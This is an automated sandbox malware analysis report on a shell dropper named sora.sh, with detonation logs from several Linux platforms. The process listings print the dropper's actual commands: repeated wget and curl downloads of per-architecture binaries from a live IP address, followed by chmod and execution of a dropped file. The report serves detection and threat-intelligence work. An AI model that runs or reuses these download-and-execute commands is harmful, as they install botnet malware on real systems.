Malware Analysis Report

2025-01-23 15:15

Sample ID 240822-1l7ysszbmf
Target sora.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags: antivm
Score: 7/10

Analysis Overview

Score: 7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file sora.sh was found to show suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian12-armhf-20240418-en

Max time kernel

299s

Max time network

302s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration (tag: antivm)

Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-timedated.service-eNtkgh]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-5 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian12-mipsel-20240221-en

Max time kernel

300s

Max time network

298s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-timedated.service-vrdggE]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 1.1.1.1:53 debian12-mipsel-20240221-en-0 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian9-armhf-20240611-en

Max time kernel

300s

Max time network

286s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration (tag: antivm)

Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-yLlaTN]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

295s

Max time network

297s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 _http._tcp.se.archive.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
US 1.1.1.1:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
GB 185.125.190.81:80 security.ubuntu.com tcp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp
US 8.8.8.8:53 _http._tcp.saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 _http._tcp.chuangtzu.ftp.acc.umu.se udp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 chuangtzu.ftp.acc.umu.se udp
US 8.8.8.8:53 chuangtzu.ftp.acc.umu.se udp
US 1.1.1.1:53 saimei.ftp.acc.umu.se udp
US 1.1.1.1:53 chuangtzu.ftp.acc.umu.se udp
US 1.1.1.1:53 chuangtzu.ftp.acc.umu.se udp
SE 194.71.11.167:80 chuangtzu.ftp.acc.umu.se tcp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
US 8.8.8.8:53 saimei.ftp.acc.umu.se udp
SE 194.71.11.138:80 saimei.ftp.acc.umu.se tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

299s

Max time network

295s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-timedated.service-BromBo systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 91.189.91.81:80 security.ubuntu.com tcp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:50

Platform

debian9-mipsbe-20240418-en

Max time kernel

300s

Max time network

283s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
